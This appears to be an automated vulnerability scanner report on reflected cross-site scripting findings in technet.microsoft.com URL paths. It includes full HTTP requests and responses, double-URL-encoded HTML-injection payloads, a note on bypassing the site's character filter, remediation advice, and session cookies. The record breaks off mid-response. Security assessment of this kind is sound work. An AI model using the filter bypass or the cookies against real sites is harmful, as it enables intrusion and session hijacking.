Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:59:37 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727085.aspxca19c"><a>185ce44d500" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1e4c%2522%253e%253ca%253e5114cf46764 was submitted in the REST URL parameter 1. This input was echoed as c1e4c"><a>5114cf46764 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usc1e4c%2522%253e%253ca%253e5114cf46764/library/bb727091.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:18:58 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usc1e4c"><a>5114cf46764/library/bb727091" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c0ed%2522%253e%253ca%253e31abbdfd032 was submitted in the REST URL parameter 2. This input was echoed as 5c0ed"><a>31abbdfd032 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library5c0ed%2522%253e%253ca%253e31abbdfd032/bb727091.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:19:43 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library5c0ed"><a>31abbdfd032/bb727091" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35bc4%2522%253e%253ca%253edfa7e72bc0e was submitted in the REST URL parameter 3. This input was echoed as 35bc4"><a>dfa7e72bc0e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727091.aspx35bc4%2522%253e%253ca%253edfa7e72bc0e HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10210
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:20:30 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727091.aspx35bc4"><a>dfa7e72bc0e" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80cf1%2522%253e%253ca%253e388be4a0e2f was submitted in the REST URL parameter 1. This input was echoed as 80cf1"><a>388be4a0e2f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:50:27 GMT
Content-Length: 10175
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us80cf1"><a>388be4a0e2f/library/bb727099" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ce54%2522%253e%253ca%253e94c65e280b2 was submitted in the REST URL parameter 2. This input was echoed as 5ce54"><a>94c65e280b2 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:50:59 GMT
Content-Length: 10175
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library5ce54"><a>94c65e280b2/bb727099" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95e2f%2522%253e%253ca%253eca85967eeac was submitted in the REST URL parameter 3. This input was echoed as 95e2f"><a>ca85967eeac in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:51:31 GMT
Content-Length: 10186
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727099.aspx95e2f"><a>ca85967eeac" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4139%2522%253e%253ca%253e35360230e6 was submitted in the REST URL parameter 1. This input was echoed as e4139"><a>35360230e6 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-use4139%2522%253e%253ca%253e35360230e6/library/bb727159.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10198
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:26 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-use4139"><a>35360230e6/library/bb727159" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17a18%2522%253e%253ca%253e8384bc7b34d was submitted in the REST URL parameter 2. This input was echoed as 17a18"><a>8384bc7b34d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library17a18%2522%253e%253ca%253e8384bc7b34d/bb727159.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
